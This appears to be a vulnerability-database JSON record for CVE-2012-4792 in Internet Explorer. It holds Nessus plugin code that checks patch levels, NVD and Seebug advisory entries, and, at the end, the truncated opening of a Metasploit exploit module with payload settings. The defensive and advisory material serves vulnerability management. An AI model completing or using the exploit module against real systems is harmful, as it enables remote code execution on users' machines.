script_cvs_date(\"Date: 2018/07/30 15:31:33\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\", \"23785\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/ms13-008\");\n script_set_attribute(\n 
attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = 
'2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", 
dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, 
file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "viewCount": 7}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-07-31T09:45:12"}], "edition": 14, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "254e47b75e3e4b92eddce6ae2e9b47a4"}, {"key": "cvelist", "hash": "432dbc91e05813e6c7c38e4258d2b638"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "description", "hash": "538d0d1c332ac3dd3e1d9aa41bec0d37"}, {"key": "href", "hash": "e8ec5d02e016cac43a330cd6a189f48c"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "c9898bc973bfffca5119f1a3bfa73a8d"}, {"key": "pluginID", "hash": "9eac560d661140becf2386e61f0c3aa7"}, {"key": "published", "hash": "ed4584402ef3628bb7394dce3e4ce55d"}, {"key": "references", "hash": "6f08f84e3b368ff5e99adc78c0a77eab"}, {"key": "reporter", "hash": "528cea5b87bf77107bd9f05291bbffe5"}, {"key": "sourceData", "hash": "61dcfa1ba98bb298fd5d06d3d95c176e"}, {"key": "title", "hash": "e0495b755cbd4bc646c8cd4fa1af24d6"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "475714938bd49be47e4a2b5da616cd4de03a84fb5d96abcc6016882bc4631866", "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-4792"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119168", "PACKETSTORM:119186"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902699", "OPENVAS:902699"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12835"]}, {"type": "seebug", "idList": ["SSV:60551"]}, {"type": 
"threatpost", "idList": ["THREATPOST:39F4459D592F1F044F7A11772E4B8ACE", "THREATPOST:37FD3A8A338F59D00D9F7966AFF5067F", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543"]}, {"type": "symantec", "idList": ["SMNTC-57070"]}, {"type": "nessus", "idList": ["SMB_KB2794220.NASL"]}, {"type": "saint", "idList": ["SAINT:2EF245955FDA0606FF9A743D9132C6A8", "SAINT:E4225C669F34358E2FC7EE71D604FA0A", "SAINT:DCB95B394157102378C2A8CADFE280E8"]}, {"type": "exploitdb", "idList": ["EDB-ID:23785", "EDB-ID:23754"]}, {"type": "zdt", "idList": ["1337DAY-ID-20069"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/IE_CBUTTON_UAF"]}, {"type": "cert", "idList": ["VU:154201"]}, {"type": "thn", "idList": ["THN:5ACF233F4E37E6A4975B246F2082107C", "THN:7ACF921BA3C582C8760C348FD2475BC2"]}], "modified": "2019-11-03T12:15:46"}, "score": {"value": 9.6, "vector": "NONE", "modified": "2019-11-03T12:15:46"}, "vulnersScore": 9.6}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is 
affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 
\"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n 
hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", 
min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "pluginID": "63522", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:12:25", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012.", "modified": "2019-02-26T14:04:00", "id": "CVE-2012-4792", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792", "published": "2012-12-30T18:55:00", "title": "CVE-2012-4792", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:47:20", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 57070\r\nCVE(CAN) ID: CVE-2012-4792\r\n\r\nMicrosoft Internet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer\u5728mshtml!CDwnBindInfo\u5bf9\u8c61\u7684\u5904\u7406\u4e0a\u5b58\u5728\u91ca\u653e\u540e\u91cd\u7528\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u901a\u8fc7\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\u6076\u610f\u7f51\u9875\u5185\u5bb9\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\n\u6b64\u6f0f\u6d1e\u662f0day\u6f0f\u6d1e\uff0c\u76ee\u524d\u5df2\u88ab\u53d1\u73b0\u7528\u4e8e\u6267\u884c\u9488\u5bf9\u6027\u7684\u653b\u51fb\u3002\r\n\r\n\u4e0d\u53d7\u5f71\u54cd\u7cfb\u7edf\uff1a\r\nMicrosoft Internet Explorer 9.x\r\nMicrosoft Internet Explorer 10.x\n0\nMicrosoft Internet Explorer 8.x\r\nMicrosoft Internet Explorer 7.x\r\nMicrosoft Internet Explorer 6.x\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0c\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* 
\u5728\u5382\u5546\u8865\u4e01\u53d1\u5e03\u4e4b\u524d\uff0c\u6211\u4eec\u5efa\u8bae\u7528\u6237\u6682\u65f6\u6539\u7528\u975eIE\u5185\u6838\u6d4f\u89c8\u5668\uff0c\u5982Firefox\u3001Chrome\u3002\r\n\r\n* \u5347\u7ea7IE\u5230\u7248\u672c9\u621610\uff0c\u56e0\u4e3a\u8fd9\u4e24\u4e2a\u7248\u672c\u7684IE\u4e0d\u53d7\u6b64\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002\r\n\r\n* \u5bf9\u4e8eIE 6\u30017\u30018\u7248\u672c\u6d4f\u89c8\u5668\u53ef\u4ee5\u91c7\u7528\u5982\u4e0b\u9632\u62a4\u63aa\u65bd:\r\n\r\n \u91c7\u7528\u5382\u5546\u63d0\u4f9b\u7684Enhanced Mitigation Experience Toolkit (EMET)\u5de5\u5177\u3002\u6b64\u65b9\u6cd5\u80fd\u6709\u6548\u9632\u8303\uff0c\u4e14\u4e0d\u5f71\u54cd\u6b63\u5e38\u7f51\u7ad9\u7684\u8bbf\u95ee\u3002\r\n \r\n \u589e\u5f3a\u7f13\u89e3\u4f53\u9a8c\u5de5\u5177\u5305\uff08EMET\uff09\u662f\u4e00\u4e2a\u5b9e\u7528\u5de5\u5177\uff0c\u7528\u4e8e\u9632\u6b62\u8f6f\u4ef6\u4e2d\u7684\u6f0f\u6d1e\u88ab\u6210\u529f\u5229\u7528\u3002\r\n \u4ece\u5982\u4e0b\u7f51\u5740\u4e0b\u8f7d\u589e\u5f3a\u7f13\u89e3\u4f53\u9a8c\u5de5\u5177\u5305\uff1a\r\n http://go.microsoft.com/fwlink/?LinkID=200220&clcid=0x409\r\n \r\n \u5b89\u88c5\u4ee5\u540e\u8fd0\u884c\uff0c\u5728\u754c\u9762\u4e2d\u70b9\u51fb\u201cConfigure Apps\u201d\uff0c\u5728\u5bf9\u8bdd\u6846\u4e2d\u70b9\u51fb\u201cAdd\u201d\uff0c\u6d4f\u89c8\u5230IE\u6240\u5728\u7684\u5b89\u88c5\u76ee\u5f55\uff08\u901a\u5e38\u662fc:\\program files\\Internet Explorer\\\uff09\u9009\u62e9 iexplore.exe\uff0c\u70b9\u51fb\u201c\u6253\u5f00\u201d\uff0c IE\u5c31\u88ab\u52a0\u5165\u5230\u53d7\u4fdd\u62a4\u9879\u76ee\u5217\u8868\u4e2d\uff0c\u70b9\u51fb\u201cOK\u201d\uff0c\u5982\u679c\u6709IE\u6b63\u5728\u8fd0\u884c\u7684\u8bdd\u9700\u8981\u91cd\u542f\u4e00\u4e0b\u5e94\u7528\u3002\r\n\r\n 
\u4e5f\u53ef\u91c7\u7528\u7c7b\u4f3c\u7684\u64cd\u4f5c\u628a\u5176\u4ed6\u7684\u5e94\u7528\u7a0b\u5e8f\u52a0\u5165\u4fdd\u62a4\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u4f46\u5df2\u7ecf\u53d1\u5e03\u4e86\u9488\u5bf9\u6b64\u6f0f\u6d1e\u7684\u516c\u544a\uff0c\u5efa\u8bae\u7528\u6237\u91c7\u7528\u5382\u5546\u63a8\u8350\u7684\u4e34\u65f6\u89e3\u51b3\u65b9\u6848\u5904\u7406\uff1a\r\n\r\nhttp://technet.microsoft.com/en-us/security/advisory/2794220", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60551", "id": "SSV:60551", "title": "Microsoft Internet Explorer 6/7/8 mshtml!CDwnBindInfo\u5bf9\u8c61\u91ca\u653e\u540e\u91cd\u7528\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "packetstorm": [{"lastseen": "2016-12-05T22:21:02", "bulletinFamily": "exploit", "description": "", "modified": "2013-01-02T00:00:00", "published": "2013-01-02T00:00:00", "href": "https://packetstormsecurity.com/files/119186/Microsoft-Internet-Explorer-CButton-Object-Use-After-Free.html", "id": "PACKETSTORM:119186", "type": "packetstorm", "title": "Microsoft Internet Explorer CButton Object Use-After-Free", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Microsoft Internet Explorer. A \nuse-after-free condition occurs when a CButton object is freed, but a reference \nis kept and used again during a page reload, an invalid memory that's controllable \nis used, and allows arbitrary code execution under the context of the user. \n \nPlease note: This vulnerability has been exploited in the wild targeting \nmainly China/Taiwan/and US-based computers. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'eromang', \n'mahmud ab rahman', \n'juan vazquez', \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2012-4792' ], \n[ 'US-CERT-VU', '154201' ], \n[ 'BID', '57070' ], \n[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], \n[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], \n[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], \n[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ], \n[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ] \n], \n'Payload' => \n{ \n'Space' => 980, \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 
